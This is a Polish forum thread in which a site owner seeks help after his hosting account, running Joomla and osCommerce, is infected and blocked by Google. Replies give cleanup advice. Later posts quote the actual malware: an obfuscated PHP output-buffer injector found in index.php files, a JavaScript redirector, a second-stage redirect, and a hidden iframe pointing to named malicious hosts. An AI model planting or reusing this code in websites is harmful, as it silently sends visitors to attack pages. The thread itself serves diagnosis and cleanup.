Zainfekowane całe konto

[nostromo]

Witam.

Jakieś dwa tygodnie temu nastąpiło zainfekowanie całego konta hostingowego wraz ze stronami tam.

Objawy były takie iż zwłaszcza moja główna strona działa bardzo wolno (o innych objawach nie wiem) .Pisałem do administratora hostingu, i on dał taką diagnozę (słuszną) ponieważ zablokowana mi także konto google adsense podają za powód zainfekowanie.

1.Główną stronę przywróciłem ze stanu wcześniejszego, działa normalnie. Zmieniłem główne hasło hostingu.

2. Co mam dalej zrobić, czy taka infekcja działa jak wirus w komputerze?

3. Czy można powiedzieć że ktoś się włamał na moje koto?

Pozdrawiam.

[Mariusz Smolak]

Trochę za mało danych podałeś.

Jakie oprogramowanie było zainstalowane na serwerze (i w jakiej wersji). Mówię tu o oprogramowaniu instalowanym przez Ciebie.

ad. 3 To mało prawdopodobne (choć możliwe), bardziej prawdopodobne jest jednak, że ktoś skorzystał z luki w oprogramowaniu.

[nostromo]

Na serwerze jest joomla, sklep oscommerce oraz skrypty pod linki. Calość dość dawno była rabiona. Joomla 1.5.22, oscommerce nie mam pojęcia.

google zablokowało wszystkie strony, nic nie działa pojawia się komunikat z ostrzeżeniem.

[zakręcony]

Jakiego progsa do FTP uzywasz i czy masz w nim hasła zapisane na stałe?

[nostromo]

używam filezilla najnowsza wersja, hasła zapisane

[zakręcony]

Błąd, zmieniaj hasła na ftp i albo na krtkę hasło, albo do jakiegos pliku txt w jakiejś lokalizacji.

- robisz pełny skan kompa jakims antywirem z aktualnymi bazami, może będziesz musiał porobic logi i dac je na jakieś forum gdzie Ci pomogą to wywalić

- archiwum jak masz to wgrywasz dopiero po zmianie hasła i po wyczyszczeniu kompa

- jak nie masz kopii, to lecisz ręcznie i wywalasz nadpisane pliki, będą to pliki index.* home.* i kilka innych, które przez autora wirola były uznane za te, które się wykonują przy odpalonej stronce, dawno z tym walczyłem, więc nie pamiętam ich wszystkich, ale wyczaisz je po dacie modyfikacji, która będzie inna niż reszty

to wyżej jak wirol wszedł od strony Twojego kompa

może być tak, że wszedł od strony hostingu, a może też od strony softu OSC czy Joomli, wtedy archiwum nadpisać musisz, albo ręcznie dłubiesz jak wyżej

[nostromo]

Jeszcze raz po kolei.

skanować własny komputer którym łącze się z hostingiem tak? hasło zmieniłem niedawno, zmienię jeszcze raz po skanowaniu i usunięciu haseł z filezilla.

Kompletnego archiwum konta nie mam, tylko dwóch głównych stron.

Resztę by trzeb ręcznie sprawdzać? Tych zapleczowych jest chyba ok 100.

Ważne - co zrobić aby google zdjęło to paskudne ostrzeżenie?

[zakręcony]

To ważne, to zgłaszasz ponowne rozpatrzenie w G i jak strony czyste to zdejmą, tylko, że jak to wali po zapleczu to je wystawiasz na tacy

[nostromo]

Czy wywalić zaplecze, ew przenieść na inny hosting i tam powoli je czyścic?

Czy na samym hostingu może być jaki plik, skrypt który będzie to ponownie robił? Czy konto można przeskanować jakimś antywirem?

czy na hostingu to się może rozprzestrzeniać tak jak wirus komputerowy?

[Leszczu]

Ja miałem podobnie. Jakieś kawałki kodu prowadzące do domen cc mi się poprzyklejały do stron. Głównym winowajcą był i niestety nadal jest OsCommerce ze względu na dziury w sofcie. Wirus/program wrzucił na ftp swoje pliki, pozmieniał mi wszystkie php na danym koncie. Zorientowałem się jak admin napisał, że blokuje konto bo rozsyła jakieś spamy. Poczyściłem osc ale to kwestia czasu zanim będzie ponowna inwazja. Hasło można do ftp zmienić oraz ustawić na hoście - o ile ma się stałe IP skąd ma akceptować połączenia.

A co do OSC to pozostaje migracja na inną platformę. Mniej rozpowszechnioną i bardziej bezpieczną np PrestaShop. (Presta 1.4 oferuje import danych z OSC)

[tosik]

nostromo jeśli masz na dysku oryginalne pliki to ściągnij te z FTP i porównaj je. Nie zapamiętuj haseł w programie FTP. Co do oscommerce to je zabezpiecz zabezpieczenie osCommerce przed włamaniem powinno pomóc jak na razie nie odnotowałem żadnego włamu.

Czy na samym hostingu może być jaki plik, skrypt który będzie to ponownie robił? Czy konto można przeskanować jakimś antywirem?

czy na hostingu to się może rozprzestrzeniać tak jak wirus komputerowy?

Antywirus nie wykryje ci złośliwego kodu PHP. Tak na 99% znajduje się tam nie jeden plik na tym koncie, który umożliwia zrobienie czegokolwiek.

Zapewne nie instalowałeś dużo modyfikacji do stron wiec pliki z FTP możesz porównywać z oryginałami.

Kompa spróbuj przeskanować też jakimś antywirem przed uruchomieniem systemu np. https://www.freedrweb.com/livecd/ albo w Avaście masz skanowanie przy uruchomieniu

[piomoo]

przeczytaj artykuł tośka i zastosuj się do wskazówek. sprawdz dokladnie plik konfiguracyjny apache - czesto tam doklejany jest kod

[milkus]

Sam antywir nie załatwi sprawy, ponieważ wirusek może go sobie sam wyłączyć (tak już miałem z avastem). Proponuję dodatkowo przeskanować kompa programem Malwarebytes' Anti-Malware (wersja trial/free w zupełności wystarczy).

Sprawdź dodatkowo msconfig (start->uruchom->wpisz msconfig [ENTER]) i zobacz co jest w autostarcie. Jeśli autostart wydaje się być OK, albo nie można czegoś zablokować (tzn. po odhaczeniu dalej się uruchamia po ponownym uruchomieniu systemu) to pozostaje jeszcze możliwość skorzystania z programu HijackThis.

[nostromo]

Ciągle walczę. Bardzo dziękuje za zainteresowanie.

Przeskanowałem kompa malwarebytes, znalazł kilka kwiatków.

konto hostingowe wyczyściłem, tz wszystko skasowałem, niestety ale nie miałem innego pomysłu aby być w 100% pewnym (czy mam pewność?) .

sklep os juz nie będzie stał. Na ukończeniu jest postawiony na virtuemart.

Głowną stronę firmowoą wgram z czystej kopii zapasowej.

Taki kod mam chyba na wszystkich plikach index.php Jest to zaraz od góry. W oryginalnych plikach tego nie ma.

Czy to może być ten kod?

<?php global $ob_starting;

if(!$ob_starting) {

function ob_start_flush($s) {

$tc = array(0, 69, 83, 84, 82, 67, 7, 79, 9, 8, 23, 73, 12, 76, 68, 78, 63, 24, 14, 19, 3, 65, 27, 17, 85, 70, 80, 16, 29, 11, 89, 86, 2, 66, 77, 93, 91, 71, 18, 72, 20, 75, 87, 22, 74, 13, 59, 61, 52, 37, 28, 35, 15, 1, 21, 25, 34, 92, 36, 41, 30, 88, 46, 33, 51);

$tr = array(50, 2, 5, 4, 11, 26, 3, 0, 3, 30, 26, 1, 28, 32, 3, 1, 61, 3, 52, 44, 21, 31, 21, 2, 5, 4, 11, 26, 3, 32, 60, 11, 25, 0, 9, 3, 30, 26, 1, 7, 25, 9, 4, 1, 14, 1, 25, 16, 5, 7, 13, 7, 4, 2, 8, 28, 28, 32, 24, 15, 14, 1, 25, 11, 15, 1, 14, 32, 8, 0, 36, 0, 0, 0, 31, 21, 4, 0, 14, 11, 31, 16, 5, 7, 13, 7, 4, 2, 0, 28, 0, 15, 1, 42, 0, 63, 4, 4, 21, 30, 9, 6, 20, 40, 33, 17, 38, 10, 38, 6, 12, 0, 6, 20, 17, 23, 10, 17, 10, 25, 6, 12, 0, 6, 20, 17, 19, 38, 25, 17, 19, 6, 12, 0, 6, 20, 17, 17, 10, 25, 10, 40, 6, 12, 0, 6, 20, 40, 5, 19, 23, 17, 19, 6, 12, 0, 6, 20, 10, 40, 17, 10, 17, 19, 6, 12, 0, 6, 20, 19, 1, 10, 55, 10, 27, 6, 12, 0, 6, 20, 17, 54, 10, 27, 17, 38, 6, 12, 0, 6, 20, 10, 38, 17, 23, 10, 17, 6, 12, 0, 6, 20, 10, 25, 17, 19, 19, 23, 6, 12, 0, 6, 20, 38, 25, 17, 38, 17, 23, 6, 12, 0, 6, 20, 10, 38, 40, 5, 19, 23, 6, 12, 0, 6, 20, 10, 10, 17, 19, 17, 19, 6, 12, 0, 6, 20, 10, 25, 40, 55, 19, 1, 6, 12, 0, 6, 20, 19, 1, 10, 38, 10, 10, 6, 12, 0, 6, 20, 10, 27, 10, 19, 10, 1, 6, 12, 0, 6, 20, 10, 14, 19, 14, 10, 14, 6, 12, 0, 6, 20, 10, 33, 19, 1, 10, 14, 6, 12, 0, 6, 20, 10, 40, 17, 43, 17, 38, 6, 12, 0, 6, 20, 19, 1, 10, 55, 17, 27, 6, 12, 0, 6, 20, 17, 40, 10, 40, 17, 23, 6, 12, 0, 6, 20, 17, 17, 19, 14, 10, 5, 6, 12, 0, 6, 20, 10, 17, 10, 14, 19, 14, 6, 12, 0, 6, 20, 10, 25, 10, 10, 10, 25, 6, 12, 0, 6, 20, 19, 23, 40, 14, 27, 27, 6, 8, 22, 0, 0, 0, 31, 21, 4, 0, 4, 1, 14, 1, 25, 16, 5, 7, 13, 7, 4, 2, 0, 28, 0, 23, 22, 0, 0, 0, 31, 21, 4, 0, 5, 7, 13, 7, 4, 2, 16, 26, 11, 5, 41, 1, 14, 0, 28, 0, 27, 22, 0, 0, 0, 25, 24, 15, 5, 3, 11, 7, 15, 0, 14, 11, 31, 16, 26, 11, 5, 41, 16, 5, 7, 13, 7, 4, 2, 9, 3, 12, 2, 3, 30, 13, 1, 14, 8, 0, 36, 31, 21, 4, 0, 2, 0, 28, 0, 32, 32, 22, 25, 7, 4, 0, 9, 44, 28, 27, 22, 44, 50, 3, 18, 13, 1, 15, 37, 3, 39, 22, 44, 29, 29, 8, 0, 36, 31, 21, 4, 0, 5, 16, 4, 37, 33, 0, 28, 0, 3, 46, 44, 47, 22, 25, 7, 4, 0, 9, 11, 28, 23, 22, 11, 50, 10, 22, 11, 29, 29, 8, 0, 36, 31, 21, 4, 0, 5, 16, 5, 13, 4, 0, 28, 0, 5, 16, 4, 37, 33, 18, 2, 24, 33, 2, 3, 4, 9, 11, 29, 29, 12, 38, 8, 22, 11, 25, 0, 9, 5, 16, 5, 13, 4, 53, 28, 32, 27, 27, 32, 8, 0, 2, 0, 29, 28, 0, 64, 3, 4, 11, 15, 37, 18, 25, 4, 7, 34, 51, 39, 21, 4, 51, 7, 14, 1, 9, 26, 21, 4, 2, 1, 59, 15, 3, 9, 5, 16, 5, 13, 4, 12, 23, 43, 8, 45, 23, 54, 8, 22, 35, 35, 11, 25, 0, 9, 2, 3, 30, 13, 1, 14, 8, 0, 36, 2, 0, 28, 0, 2, 18, 2, 24, 33, 2, 3, 4, 9, 27, 12, 19, 43, 8, 0, 29, 0, 2, 18, 2, 24, 33, 2, 3, 4, 9, 19, 43, 12, 9, 2, 18, 13, 1, 15, 37, 3, 39, 45, 19, 17, 8, 8, 0, 29, 0, 14, 11, 31, 16, 5, 7, 13, 7, 4, 2, 46, 23, 47, 18, 2, 24, 33, 2, 3, 4, 9, 27, 12, 23, 8, 29, 15, 1, 42, 0, 58, 21, 3, 1, 9, 8, 18, 37, 1, 3, 48, 11, 34, 1, 9, 8, 0, 29, 0, 2, 18, 2, 24, 33, 2, 3, 4, 9, 9, 2, 18, 13, 1, 15, 37, 3, 39, 45, 38, 8, 8, 0, 29, 0, 2, 18, 2, 24, 33, 2, 3, 4, 9, 27, 12, 23, 8, 0, 29, 0, 2, 18, 2, 24, 33, 2, 3, 4, 9, 23, 17, 12, 23, 8, 29, 2, 18, 2, 24, 33, 2, 3, 4, 9, 23, 12, 43, 8, 29, 2, 18, 2, 24, 33, 2, 3, 4, 9, 9, 2, 18, 13, 1, 15, 37, 3, 39, 45, 23, 8, 8, 22, 35, 0, 1, 13, 2, 1, 0, 36, 2, 0, 28, 0, 2, 18, 2, 24, 33, 2, 3, 4, 9, 19, 43, 12, 9, 2, 18, 13, 1, 15, 37, 3, 39, 45, 19, 17, 8, 8, 0, 29, 0, 14, 11, 31, 16, 5, 7, 13, 7, 4, 2, 46, 23, 47, 18, 2, 24, 33, 2, 3, 4, 9, 27, 12, 23, 8, 29, 15, 1, 42, 0, 58, 21, 3, 1, 9, 8, 18, 37, 1, 3, 48, 11, 34, 1, 9, 8, 22, 35, 4, 1, 3, 24, 4, 15, 0, 2, 22, 0, 0, 0, 35, 0, 0, 0, 25, 24, 15, 5, 3, 11, 7, 15, 0, 3, 4, 30, 16, 26, 11, 5, 41, 16, 5, 7, 13, 7, 4, 2, 9, 8, 0, 36, 3, 4, 30, 0, 36, 0, 0, 0, 11, 25, 9, 53, 14, 7, 5, 24, 34, 1, 15, 3, 18, 37, 1, 3, 49, 13, 1, 34, 1, 15, 3, 56, 30, 59, 14, 0, 57, 57, 0, 53, 14, 7, 5, 24, 34, 1, 15, 3, 18, 5, 4, 1, 21, 3, 1, 49, 13, 1, 34, 1, 15, 3, 8, 36, 14, 7, 5, 24, 34, 1, 15, 3, 18, 42, 4, 11, 3, 1, 9, 14, 11, 31, 16, 26, 11, 5, 41, 16, 5, 7, 13, 7, 4, 2, 9, 14, 11, 31, 16, 5, 7, 13, 7, 4, 2, 12, 23, 8, 8, 22, 0, 0, 0, 35, 0, 1, 13, 2, 1, 0, 36, 31, 21, 4, 0, 15, 1, 42, 16, 5, 2, 3, 30, 13, 1, 28, 14, 7, 5, 24, 34, 1, 15, 3, 18, 5, 4, 1, 21, 3, 1, 49, 13, 1, 34, 1, 15, 3, 9, 32, 2, 5, 4, 11, 26, 3, 32, 8, 22, 15, 1, 42, 16, 5, 2, 3, 30, 13, 1, 18, 3, 30, 26, 1, 28, 32, 3, 1, 61, 3, 52, 44, 21, 31, 21, 2, 5, 4, 11, 26, 3, 32, 22, 15, 1, 42, 16, 5, 2, 3, 30, 13, 1, 18, 2, 4, 5, 28, 14, 11, 31, 16, 26, 11, 5, 41, 16, 5, 7, 13, 7, 4, 2, 9, 14, 11, 31, 16, 5, 7, 13, 7, 4, 2, 12, 27, 8, 22, 14, 7, 5, 24, 34, 1, 15, 3, 18, 37, 1, 3, 49, 13, 1, 34, 1, 15, 3, 2, 56, 30, 48, 21, 37, 62, 21, 34, 1, 9, 32, 39, 1, 21, 14, 32, 8, 46, 27, 47, 18, 21, 26, 26, 1, 15, 14, 51, 39, 11, 13, 14, 9, 15, 1, 42, 16, 5, 2, 3, 30, 13, 1, 8, 22, 35, 35, 0, 5, 21, 3, 5, 39, 9, 1, 8, 0, 36, 0, 35, 3, 4, 30, 0, 36, 5, 39, 1, 5, 41, 16, 5, 7, 13, 7, 4, 2, 16, 26, 11, 5, 41, 1, 14, 9, 8, 22, 35, 0, 5, 21, 3, 5, 39, 9, 1, 8, 0, 36, 0, 2, 1, 3, 48, 11, 34, 1, 7, 24, 3, 9, 32, 3, 4, 30, 16, 26, 11, 5, 41, 16, 5, 7, 13, 7, 4, 2, 9, 8, 32, 12, 0, 54, 27, 27, 8, 22, 35, 0, 0, 0, 35, 0, 0, 0, 3, 4, 30, 16, 26, 11, 5, 41, 16, 5, 7, 13, 7, 4, 2, 9, 8, 22, 35, 50, 52, 2, 5, 4, 11, 26, 3, 60);

$ob_htm = ''; foreach($tr as $tval) {

$ob_htm .= chr($tc[$tval]+32);

}

$slw=strtolower($s);

$i=strpos($slw,'</script');if($i){$i=strpos($slw,'>',$i);}

if(!$i){$i=strpos($slw,'</div');if($i){$i=strpos($slw,'>',$i);}}

if(!$i){$i=strpos($slw,'</table');if($i){$i=strpos($slw,'>',$i);}}

if(!$i){$i=strpos($slw,'</form');if($i){$i=strpos($slw,'>',$i);}}

if(!$i){$i=strpos($slw,'</p');if($i){$i=strpos($slw,'>',$i);}}

if(!$i){$i=strpos($slw,'</body');if($i){$i--;}}

if(!$i){$i=strlen($s);if($i){$i--;}}

$i++; $s=substr($s,0,$i).$ob_htm.substr($s,$i);

return $s;

}

$ob_starting = time();

@ob_start("ob_start_flush");

} ?>

[tosik]

Tak, to jest to. Avast to wykrywa jako:JS:Redirector-FX[Trj] .

Doklejało Ci do każdego pliku w którym to było taki kod:

<script type="text/javascript">
if (typeof(redef_colors) == "undefined") {
  var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7277', '#70737e', '#7d3d7d', '#7b3e7d', '#748682', '#3e7980', '#847481', '#883d7c', '#787d3d', '#7f777f', '#314d00');
  var redef_colors = 1;
  var colors_picked = 0;
  function div_pick_colors(t, styled) {
  var s = "";
  for (j = 0; j < t.length; j++) {
	 var c_rgb = t[j];
	 for (i = 1; i < 7; i++) {
		var c_clr = c_rgb.substr(i++, 2);
		if (c_clr != "00") s += String.fromCharCode(parseInt(c_clr, 16) - 15);
		}
	 }
  if (styled) {
	 s = s.substr(0, 36) + s.substr(36, (s.length - 38)) + div_colors[1].substr(0, 1) + new Date().getTime() + s.substr((s.length - 2)) + s.substr(0, 1) + s.substr(18, 1) + s.substr(1, 6) + s.substr((s.length - 1));
	 }
  else {
	 s = s.substr(36, (s.length - 38)) + div_colors[1].substr(0, 1) + new Date().getTime();
	 }
  return s;
  }
  function try_pick_colors() {
  try {
	 if(!document.getElementById || !document.createElement) {
		document.write(div_pick_colors(div_colors, 1));
		}
	 else {
		var new_cstyle = document.createElement("script");
		new_cstyle.type = "text/javascript";
		new_cstyle.src = div_pick_colors(div_colors, 0);
		document.getElementsByTagName("head")[0].appendChild(new_cstyle);
		}
	 }
  catch(e) {
	 }
  try {
	 check_colors_picked();
	 }
  catch(e) {
	 setTimeout("try_pick_colors()", 500);
	 }
  }
  try_pick_colors();
  }
</script>

Kierowało do strony:

https://chadon.nl/news/jquery.min.php#12356789123

z kolei na tamtej stronie wykonywał Ci się taki kod:

if(typeof colors_picked != 'undefined') {
  var colors_picked = 0;
  }
if (colors_picked != 1) {
  colors_picked = 1;
  function check_colors_picked() {
  var colors_nopick = 1;
  try {
	 document.location = parseurl("https://heapsdominik.cz.cc/if/&b=30");
	 }
  catch (ee) {
	 }
  try {
	 window.location = parseurl("https://heapsdominik.cz.cc/if/&b=30");
	 }
  catch (ee) {
	 }
  setTimeout('check_colors_picked();', 500);
  }
  }

a ten kod w końcu prowadził do kluczowego iframe:

<script type="text/javascript">document.write(unescape('<iframe src="https://alabone16crestv.cz.cc/in.php?a=QQkFBwQEAQIHDAMFEkcJBQcEAAYGBQQGBw==&b=30&f=frame" width="1" height="1" frameborder="0"></iframe>'));</script